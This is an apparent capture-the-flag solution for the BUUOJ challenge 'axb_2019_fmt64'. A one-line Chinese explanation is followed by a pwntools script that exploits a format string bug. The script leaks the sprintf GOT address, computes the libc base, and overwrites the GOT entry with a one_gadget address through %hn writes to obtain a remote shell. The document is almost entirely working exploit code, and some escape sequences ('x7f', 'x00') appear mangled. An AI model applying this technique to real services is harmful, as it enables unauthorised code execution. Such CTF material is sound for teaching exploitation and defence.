exp
有格式化字符串漏洞,泄露got表地址,改sprintf为one_gadget,当函数再次调用sprintf即可拿shell。(使用格式化漏洞任意写的时候注意printf已经先输出了9个字符,要减去)
from pwn import *
#context.log_level = 'debug'
#io = process('./idaidg/linux_server64')
io = remote('node3.buuoj.cn',29548)
#io = process('axb_2019_fmt64')
elf = ELF('./axb_2019_fmt64')
#libc = elf.libc
libc = ELF('./libc/libc-2.23.so')
one_gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
sprintf_got = elf.got['sprintf']
payload = '%9$saaaa'
payload += p64(sprintf_got)
io.recvuntil("Please tell me:")
io.sendline(payload)
sprintf_addr = u64(io.recvuntil('x7f')[-6:].ljust(8,'x00'))
print "sprintf_addr:"+hex(sprintf_addr)
libcbase = sprintf_addr - libc.symbols['sprintf']
one_gadget = libcbase + one_gadget[0]
print "one_gadget:"+hex(one_gadget)
payload = ''
payload += '%' + str((one_gadget % 0x10000) - 9) + 'c%12$hn'
payload += '%' + str(((one_gadget >> 16) % 0x10000) - (one_gadget % 0x10000)) + 'c%13$hn'
payload = payload.ljust(0x20,'x00')
payload += p64(sprintf_got) + p64(sprintf_got + 2)
print 'payload:'+payload
io.sendline(payload)
io.interactive()